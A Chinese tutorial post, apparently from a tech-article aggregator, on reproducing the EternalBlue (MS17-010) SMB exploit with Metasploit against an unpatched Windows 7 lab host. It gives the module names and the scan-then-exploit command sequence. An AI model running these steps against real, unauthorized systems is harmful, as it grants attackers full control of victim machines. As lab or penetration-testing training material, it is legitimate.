当前位置: 首页 > news >正文

msf复现永恒之蓝

永恒之蓝(EternalBlue)是利用 Windows 系统的 SMB 协议漏洞(MS17-010)来获取系统最高权限的漏洞,利用 Metasploit 框架(MSF)复现该漏洞是一个复杂且具有一定风险的操作,必须在合法合规的环境下进行,如在经过授权的靶场环境,以下是具体复现步骤:

前期准备

  • 攻击机:安装有 Metasploit 工具的 Kali Linux 系统,开启并联网,确保 Metasploit 能正常使用。
  • 靶机:存在 MS17-010 漏洞的 Windows 系统,如未打补丁的 Windows 7、Windows Server 2008 R2 等,关闭防火墙和杀毒软件(仅用于测试环境),并记录其 IP 地址,假设为 192.168.244.139 。
  • 网络环境:攻击机和靶机处于同一局域网,或可以相互通信.

 

利用 MSF 复现永恒之蓝漏洞

在 Kali Linux 的终端中输入msfconsole,回车启动 Metasploit 框架。

搜索相关模块:输入search ms17-010,搜索与 MS17-010 漏洞相关的模块。在搜索结果中,主要关注auxiliary/scanner/smb/smb_ms17_010(扫描模块)和exploit/windows/smb/ms17_010_eternalblue(攻击模块) 。

扫描目标主机是否存在漏洞

使用扫描模块:输入use auxiliary/scanner/smb/smb_ms17_010,使用该扫描模块。

查看缺少的信息:输入show options查看缺少的信息

设置目标主机:输入set rhosts 192.168.244.139(将 IP 地址替换为靶机的实际 IP),设置要扫描的目标主机。

运行扫描:输入run,开始扫描目标主机是否存在 MS17-010 漏洞。如果目标主机存在漏洞,扫描结果会有相应提示。

调用攻击模块:输入use exploit/windows/smb/ms17_010_eternalblue,调用永恒之蓝的攻击模块。

配置攻击模块:输入show options查看攻击模块的配置项,然后输入set rhosts 192.168.244.139设置目标机的 IP 地址。

执行攻击:输入run运行攻击模块,若成功,会与 Windows 7 系统目标机建立连接。

 

这样就入侵成功了,后续需要进行什么操作可自行选择 

 

http://www.dtcms.com/a/272159.html

相关文章:

  • 每日一SQL 【各赛事的用户注册率】
  • Datawhale AI 夏令营:基于带货视频评论的用户洞察挑战赛 Notebook(下篇)
  • 流媒体服务
  • SIMATIC S7-1200的以太网通信能力:协议与资源详细解析
  • x86架构CPU市场格局
  • WIFI协议全解析05:WiFi的安全机制:IoT设备如何实现安全连接?
  • PHP安全编程实践系列(三):安全会话管理与防护策略
  • 【运维】串口、网络一些基本信息
  • 【超详细】CentOS系统Docker安装与配置一键脚本(附镜像加速配置)
  • Pinia 笔记:Vue3 状态管理库
  • 双模秒切,体验跃迁!飞利浦EVNIA双模游戏显示器27M2N6801M王者降临!
  • UnrealEngine5游戏引擎实践(C++)
  • 如何将多个.sql文件合并成一个:Windows和Linux/Mac详细指南
  • 字节 Seed 团队联合清华大学智能产业研究院开源 MemAgent: 基于多轮对话强化学习记忆代理的长文本大语言模型重构
  • 为了安全应该使用非root用户启动nginx
  • 相机:以鼠标点为中心缩放(使用OpenGL+QT开发三维CAD)
  • [Xmos] Xmos架构
  • 从面向对象编程语言PHP转到Go时的一些疑惑?
  • 同时部署两个不同版本的tomcat要如何配置环境变量
  • Xavier上安装RTSP服务端教程
  • 电商 AI 客服中的 NLP 技术:如何实现更自然的人机对话交互?
  • linux-MySQL的安装
  • 从品牌附庸到自我表达:定制开发开源AI智能名片S2B2C商城小程序赋能下的营销变革
  • SQLite3 中列(变量)的特殊属性
  • Linux下LCD驱动-IMX6ULL
  • 一款集驱动TFT屏幕/语音控制/蓝牙为一体的芯片介绍WT2606B
  • Linux驱动学习day21(GPIO子系统)
  • 【保姆级喂饭教程】GitLab创建用户规范,分支开发规范,提交日志规范
  • 标题:2025游戏反外挂终极指南:从DMA对抗到生态治理的全面防御体系
  • 【博文汇项目全维度测试报告:功能与自动化双轨验证】